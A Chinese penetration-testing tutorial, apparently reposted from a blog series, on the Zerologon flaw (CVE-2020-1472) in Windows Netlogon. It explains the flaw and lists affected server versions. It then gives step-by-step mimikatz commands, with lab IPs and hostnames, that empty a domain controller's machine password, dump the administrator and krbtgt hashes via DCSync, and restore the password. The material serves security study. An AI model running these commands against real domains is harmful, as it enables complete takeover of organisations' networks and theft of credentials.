内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)

简介

2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。

漏洞原理

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,可以向域发起Netlogon 计算机账户认证请求, 使用8字节全0 client challenge 不断尝试得到一个正确的8字节全0 client credential 通过认证,再通过相关调用完成对域控密码的修改。
具体细节可查看https://www.cynet.com/zerologon/

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用过程

1、检测目标机是否存在cve2020-1472

mimikatz
	lsadump::zerologon  /target:域控IP  /account:域控主机名$



lsadump::zerologon /target:192.168.17.2 /account:WIN-J748588TKU2$

内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)_第1张图片

清空域控密码

默认状况下,加域计算机每三十天就会更改一次计算机密码,这个密码会分别被存在计算机本地和AD里面。同时,计算机自己会保存两份密码在本地:当前的密码和以前的密码。当计算机尝试和DC创建secure channel的时候,它会先使用最新的密码,若是这个密码无效,那么它会尝试使用以前的那个密码,若是这个密码也不可以和AD域里面保存的密码匹配,那么计算机和DC之间的secure channel就会被破坏,咱们将不能经过域帐号登陆到这台电脑上

mimikatz
    lsadump::zerologon /target:域控ip /account:域控主机名$ /exploit

---------------------------------------------------------------------------
lsadump::zerologon /target:192.168.17.2 /account:WIN-J748588TKU2$ /exploit

内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)_第2张图片

 

获取目标机的HASH

mimikatz:
    lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
--------------------------------------------------------------------------------
lsadump::dcsync /domain:test.com /dc:WIN-J748588TKU2.test.com /user:administrator /authuser:WIN-J748588TKU2$ /authdomain:test.com /authpassword:"" /authntlm

内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)_第3张图片

获取hash:

Hash NTLM: 73292305e32730af1b5b94022b2b2aaa

内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)_第4张图片

 

恢复密码

在上面的攻击过程中,我们将机器的密码置为空,会导致域控脱域,原因是机器用户在AD中的密码(存储在ntds.dic)与本地注册表里面的不一致。还原域控机器账户的hash,只要将AD中的密码与注册表里面的密码保持一致即可。

mimika:
    lsadump::postzerologon /target:dc.de1ay.com /account:dc$

----------------------------------------------------------------------------

lsadump::postzerologon /target:192.168.17.2 /account:WIN-J748588TKU2$

内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)_第5张图片

你可能感兴趣的:(安全,web安全)